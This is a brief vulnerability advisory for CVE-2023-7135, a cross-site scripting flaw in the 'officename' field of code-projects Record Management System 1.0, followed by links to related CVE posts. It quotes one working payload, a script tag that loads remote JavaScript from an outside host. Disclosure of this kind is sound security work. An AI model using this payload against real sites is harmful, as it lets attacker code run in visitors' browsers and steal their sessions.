CVE-2023-7135 | code-projects Record Management System 1.0 Offices /main/offices.php officename cross site scripting

Posted by Angelo Barbosa | Dec 28, 2023 | CVE

A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting.

This vulnerability is traded as CVE-2023-7135. It is possible to launch the attack remotely. Furthermore, there is an exploit available.

CVE-2023-7135 | code-projects Record Management System 1.0 Offices /main/offices.php officename cross site scripting

Related Posts

CVE-2023-48258 | Rexroth Nexo Cordless Nutrunner up to V1500-SP2 URL cross-site request forgery

CVE-2023-41014 | code-projects Online Job Portal 1.0 Employer Username sql injection

CVE-2024-36500 | Huawei HarmonyOS/EMUI AMS Module privileges management

CVE-2021-4433 | Karjasoft Sami HTTP Server 2.0 HTTP HEAD Rrequest denial of service (ID 163138)